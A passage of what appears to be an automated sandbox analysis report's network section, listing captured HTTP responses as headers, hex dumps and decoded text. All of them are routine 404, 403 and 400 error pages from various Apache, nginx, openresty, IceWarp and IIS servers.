68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>HTTP/1.1 400 Bad RequestDate: Mon, 18 Mar 2024 08:59:05 GMTServer: ApacheContent-Length: 226Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.19.6Date: Mon, 18 Mar 2024 08:49:45 GMTContent-Type: text/htmlContent-Length: 153Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 36 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.19.6</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.16.1Date: Mon, 18 Mar 2024 10:03:38 GMTContent-Type: application/octet-streamContent-Length: 5Connection: keep-aliveData Raw: 62 72 65 61 6b Data Ascii: break
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundData Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404 Not Found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 08:59:08 GMTExpires: Sat, 01 Jan 1970 22:00:00 GMTPragma: no-cacheCache-Control: no-cache, no-store, must-revalidateVary: Accept-EncodingConnection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 62 3e 5b 34 30 34 5d 4e 6f 74 20 46 6f 75 6e 64 3c 2f 62 3e Data Ascii: <b>[404]Not Found</b>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 0Date: Mon, 18 Mar 2024 08:59:08 GMTX-Frame-Options: sameoriginContent-Security-Policy: frame-ancestors 'self'
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 08:59:08 GMTExpires: Sat, 01 Jan 1970 22:00:00 GMTPragma: no-cacheCache-Control: no-cache, no-store, must-revalidateVary: Accept-EncodingConnection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 62 3e 5b 34 30 34 5d 4e 6f 74 20 46 6f 75 6e 64 3c 2f 62 3e Data Ascii: <b>[404]Not Found</b>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 08:59:08 GMTServer: Apache/2Content-Length: 315Keep-Alive: timeout=2, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 08:59:09 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundExpires: Mon, 18 Mar 2034 08:59:08 GMTServer: IceWarp/13.0.3.10 x64Date: Mon, 18 Mar 2024 08:59:08 GMTContent-Type: text/htmlContent-Length: 610Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 74 61 62 6c 65 20 77 69 64 74 68 3d 22 34 30 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 33 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 35 22 3e 3c 74 72 3e 3c 74 64 20 61 6c 69 67 6e 3d 22 6c 65 66 74 22 20 76 61 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 20 77 69 64 74 68 3d 22 33 36 30 22 3e 3c 66 6f 6e 74 20 73 74 79 6c 65 3d 22 43 4f 4c 4f 52 3a 20 62 6c 61 63 6b 3b 20 46 4f 4e 54 3a 20 31 30 70 74 2f 31 30 70 74 20 76 65 72 64 61 6e 61 22 3e 3c 62 3e 50 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 64 69 73 70 6c 61 79 65 64 3c 2f 62 3e 3c 2f 66 6f 6e 74 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 74 72 3e 3c 74 64 20 77 69 64 74 68 3d 22 34 30 30 22 3e 3c 66 6f 6e 74 20 73 74 79 6c 65 3d 22 43 4f 4c 4f 52 3a 20 62 6c 61 63 6b 3b 20 46 4f 4e 54 3a 20 38 70 74 2f 31 31 70 74 20 76 65 72 64 61 6e 61 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 66 6f 6e 74 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 74 72 3e 3c 74 64 20 77 69 64 74 68 3d 22 34 30 30 22 3e 3c 66 6f 6e 74 20 73 74 79 6c 65 3d 22 43 4f 4c 4f 52 3a 20 62 6c 61 63 6b 3b 20 46 4f 4e 54 3a 20 38 70 74 2f 31 31 70 74 20 76 65 72 64 61 6e 61 22 3e 3c 68 72 20 63 6f 6c 6f 72 3d 22 23 43 30 43 30 43 30 22 20 6e 6f 73 68 61 64 65 3e 3c 66 6f 6e 74 20 73 74 79 6c 65 3d 22 66 6f 6e 74 3a 38 70 74 2f 31 31 70 74 20 76 65 72 64 61 6e 61 3b 20 63 6f 6c 6f 72 3a 62 6c 61 63 6b 22 3e 3c 62 72 3e 49 63 65 57 61 72 70 3c 62 72 3e 34 30 34 20 4e 6f 74 20 66 6f 75 6e 64 3c 2f 66 6f 6e 74 3e 3c 2f 66 6f 6e 74 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><table width="400" cellpadding="3" cellspacing="5"><tr><td align="left" valign="middle" width="360"><font style="COLOR: black; FONT: 10pt/10pt verdana"><b>Page cannot be displayed</b></font></td></tr><tr><td width="400"><font style="COLOR: black; FONT: 8pt/11pt verdana">The requested URL was not found on this server.</font></td></tr><tr><td width="400"><font style="COLOR: black; FONT: 8pt/11pt verdana"><hr color="#C0C0C0" noshade><font style="font:8pt/11pt verdana; color:black"><br>IceWarp<br>404 Not found</font></font></td></tr></table></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 18 Mar 2024 08:59:13 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 08:59:09 GMTServer: Apache/2Content-Length: 315Keep-Alive: timeout=2, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 18 Mar 2024 08:59:09 GMTContent-Type: text/htmlContent-Length: 150Connection: closevia: CHN-GDshenzhen-CTPN1-CACHE19[1]X-CCDN-FORBID-CODE: 040000Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 18 Mar 2024 08:59:09 GMTContent-Type: text/htmlContent-Length: 150Connection: closevia: CHN-GDshenzhen-CTPN1-CACHE19[0]X-CCDN-FORBID-CODE: 040000Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 18 Mar 2024 08:59:13 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundExpires: Mon, 18 Mar 2034 08:59:08 GMTServer: IceWarp/13.0.3.10 x64Date: Mon, 18 Mar 2024 08:59:08 GMTContent-Type: text/htmlContent-Length: 610Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 74 61 62 6c 65 20 77 69 64 74 68 3d 22 34 30 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 33 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 35 22 3e 3c 74 72 3e 3c 74 64 20 61 6c 69 67 6e 3d 22 6c 65 66 74 22 20 76 61 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 20 77 69 64 74 68 3d 22 33 36 30 22 3e 3c 66 6f 6e 74 20 73 74 79 6c 65 3d 22 43 4f 4c 4f 52 3a 20 62 6c 61 63 6b 3b 20 46 4f 4e 54 3a 20 31 30 70 74 2f 31 30 70 74 20 76 65 72 64 61 6e 61 22 3e 3c 62 3e 50 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 64 69 73 70 6c 61 79 65 64 3c 2f 62 3e 3c 2f 66 6f 6e 74 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 74 72 3e 3c 74 64 20 77 69 64 74 68 3d 22 34 30 30 22 3e 3c 66 6f 6e 74 20 73 74 79 6c 65 3d 22 43 4f 4c 4f 52 3a 20 62 6c 61 63 6b 3b 20 46 4f 4e 54 3a 20 38 70 74 2f 31 31 70 74 20 76 65 72 64 61 6e 61 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 66 6f 6e 74 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 74 72 3e 3c 74 64 20 77 69 64 74 68 3d 22 34 30 30 22 3e 3c 66 6f 6e 74 20 73 74 79 6c 65 3d 22 43 4f 4c 4f 52 3a 20 62 6c 61 63 6b 3b 20 46 4f 4e 54 3a 20 38 70 74 2f 31 31 70 74 20 76 65 72 64 61 6e 61 22 3e 3c 68 72 20 63 6f 6c 6f 72 3d 22 23 43 30 43 30 43 30 22 20 6e 6f 73 68 61 64 65 3e 3c 66 6f 6e 74 20 73 74 79 6c 65 3d 22 66 6f 6e 74 3a 38 70 74 2f 31 31 70 74 20 76 65 72 64 61 6e 61 3b 20 63 6f 6c 6f 72 3a 62 6c 61 63 6b 22 3e 3c 62 72 3e 49 63 65 57 61 72 70 3c 62 72 3e 34 30 34 20 4e 6f 74 20 66 6f 75 6e 64 3c 2f 66 6f 6e 74 3e 3c 2f 66 6f 6e 74 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><table width="400" cellpadding="3" cellspacing="5"><tr><td align="left" valign="middle" width="360"><font style="COLOR: black; FONT: 10pt/10pt verdana"><b>Page cannot be displayed</b></font></td></tr><tr><td width="400"><font style="COLOR: black; FONT: 8pt/11pt verdana">The requested URL was not found on this server.</font></td></tr><tr><td width="400"><font style="COLOR: black; FONT: 8pt/11pt verdana"><hr color="#C0C0C0" noshade><font style="font:8pt/11pt verdana; color:black"><br>IceWarp<br>404 Not found</font></font></td></tr></table></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundData Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404 Not Found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 08:59:10 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 18 Mar 2024 08:59:11 GMTContent-Type: text/htmlContent-Length: 150Connection: closevia: CHN-GDshenzhen-CTPN1-CACHE19[0]X-CCDN-FORBID-CODE: 040000Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 08:59:12 GMTServer: Apache/2Content-Length: 315Keep-Alive: timeout=2, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-type: text/htmlContent-Length: 0X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffX-Frame-Options:SAMEORIGINSet-Cookie:Secure; HttpOnlyConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Mon, 18 Mar 2024 08:59:12 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 